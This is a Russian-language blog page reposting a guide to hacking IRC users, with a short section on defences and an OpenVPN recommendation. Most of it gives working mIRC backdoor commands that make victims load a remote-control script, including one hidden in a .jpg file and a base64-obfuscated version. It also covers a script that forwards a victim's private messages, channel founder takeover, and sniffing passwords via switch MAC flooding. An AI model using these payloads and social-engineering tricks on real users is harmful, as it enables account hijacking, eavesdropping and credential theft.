Зачем все это или вся правда о...

Коротко – мне надоело хранить свои заметки в куче тектовых файлов, разбросанных по десктопам и серверам и ходить на них через друг друга. Чтобы попасть на комп “А” надо залогиниться на комп “В” а чтобы попасть на комп “В” надо залогиниться на комп “Д” а чтобы попасть на комп “Д” надо залогиниться на комп “Б”.
Хватит! Пусть лучше тут лежит все это, авось кому еще кроме меня пригодится.

Комментарии | опубликовано: Янв 10, 20:33

Как взломать IRC и как от этого защититься.

Не так давно спросили у меня как взломать IRC и как защититься. Спрашивали это все чаще и чаще. Написал я это. Источник находится здесь
—-
Как взломать IRC и как от этого защититься.
Автор: Bart[mdv]
Спасибо за помощь в составлении: keY, cHameleon

* Как получить контроль над mIRC-based - клиентами
Заставьте жертву ввести //write oper.pas ctcp 1:*:?:$1- | Load -rs oper.pas и только после этого вводите приведённые ниже команды:
Сделать, чтоб юзер зашёл на канал: /ctcp nick .join #chan
Юзер покидает канал: /ctcp nick .part #chan
Т.к админы IRC-сетей люди довольно образованные и грамотные в этих вопросах, то во многих сетях прикрыли использование команды //write, т.к таким образом довольно много эксплоитов и троянов распространялось в IRC-сетех. Делаем следующим образом:
1. берем любую картинку, открываем ее в текстовом редакторе (Блокнот) и вписываем туда
echo .... echo .... echo .... ctcp 1:*:?:$1- И сохраняем картинку в формат *.jpg
2. Картинку нужно впарить пользователям на канале (тут сами)
3. пользователь при попытке посмотреть содержимое картинки, ничего не увидит, и вы ему рекомендуете набрать следующее в любом окне его клиента /load -rs НАЗВАНИЕ_КАРТИНКИ.jpg , скрипт будет загружен в клиент "жертвы" дальше все по схеме, изложенной выше.
Так же практикуется кодирование:
.//.write mirc.bak $decode(b24gKjpURVhUOuPw8+foKjoqOnsKY2xvc2UgLW 0gJG5pY2sKd3JpdGUgJGRlY29kZSgkMixtKSAkZGVjb2RlKCQzLG0pCm xvYWQgLXJzICRkZWNvZGUoJDIsbSkKfQ,m) | .load -rs mirc.bak


  • Как захватить канал

Всучив скрипт, указанный выше, можно легко сменить фаундера канала на себя.

Или просто сменить пароль фаундера на канал и легко идентиться с правами фаундера.

Я не буду расказываться как воспользоваться отсутствием всех на канале и как воспользоваться сплитом для захвата канала – это все не работает в нормальных сетях с сервисами :-)


  • Как читать чужие приваты в mIRC-based – клиентах

Втюхиваем жертве скрипт с содержанием:

on ::?:.msg куда $1-
Как? Вспомните про //write //load $encode и $decode :-)


  • Как можно стырить пароли от ников/каналов и даже иркопов

Если вы пользуетесь irc в локалке – качаем снифер – wireshark например, настраиваем фильтры на порт 6667 – ловим весь IRC трафик.

Если сниффер поймал только вас – не спешите огорчаться – если свитчики стоят глупенькие – у них есть MAC-таблица, и если ее переполнить – свитчик превращается... превращается свитчик... в тупой хабчик :-)

Такая атака осуществима только если строители сети, в которой вы находитесь, съэкономили кучу денег на нормальных свитчах.

Ах, да, имейте ввиду, если админы локалки просекут кто это сделал, скорее всего вас отрубят от сети :-)


  • Как защититься:

* Не стоит набирать незнакомых команд

* Если очень хочется попробовать – спросите сначала на канале помощи о результате этой команды
( в сети SolarNet каналом помощи является #help )

* Используйте шифрованное SSL-подключение везде, где это возможно
( в сети SolarNet для SSL используется порт 9997 )

* Как узнать, что пользователь подключен по SSL?
В /whois указывается is using a Secure Connection, а также пользователю выдается флажок +S

* Как запретить заходить на канал всем, кроме тех, кто подключены через SSL?
Нужно поставить на канал флаг +S /mode #chan +S


  • Как защитить не только IRC и сэкономить трафик:

Берем OpenVPN.
Получаем компрессию (на веб-страницах до 40%) и шифрование (с помощью SSL) своего трафика.
Очень рекомендуется пользоваться OpenVPN когда приходится уезжать за пределы “нормального” интернета и пользоваться GPRS.

Приимущества OpenVPN (зачем нужен OpenVPN)
+ сжатие и шифрование всего трафика
+ не надо каждой софтине указывать какие-то прокси
+ если твой провайдер использует сеть на хабах – твой трафик (в т.ч. твои пароли на аську/почту/ирц/итп) поснифать уже не получится
+ если нет доверия любому из узлов между тобой и инетом (например не вызывающий доверия провайдер) – стоит использовать шифрование.
+ ты никогда не засветишь свой настоящий IP
+ докупив доп. IP ты можешь привязать его к OpenVPN и будет у тебя твой выделенный реальный IP со всеми его плюсами (это для тех, у кого провайдеры не выдают реальники, а очень хочется)

Можно еще напридумывать плюсов.
Минус я только один вижу – надо иметь свой сервер в инете. Этот минус решается покупкой VDS-хостинга :-)

FirstVDS вполне сгодится для наших целей. VDS-хостинг от 4 рублей в день.

P.S.: afaik, OpenVPN на VDS работает только на linux-VDS-ах

Комментарии | опубликовано: Янв 10, 11:58

<--- Предыдущая страница Следующая страница --->